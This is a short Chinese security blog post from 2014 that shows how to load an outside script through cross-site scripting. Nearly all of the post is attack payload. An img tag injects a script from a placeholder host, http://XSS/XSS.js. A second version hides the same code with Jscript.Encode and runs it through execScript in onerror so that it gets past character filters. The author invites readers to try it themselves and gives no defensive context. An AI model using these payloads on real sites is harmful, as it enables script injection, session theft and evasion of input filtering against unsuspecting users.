教你如何在XSS中再插JS

发表评论
316 次浏览

A+

所属分类：网络安全

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前：

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >

加密后：

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >

嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

我的微信
这是我的微信扫一扫

我的微信公众号
我的微信公众号扫一扫

版权声明：本站收录文章，于2014年7月21日00:34:08，由 admin 发表，共 629 字。
转载请注明：教你如何在XSS中再插JS | 安云网 – AnYun.ORG

发表评论取消回复

文章目录
繁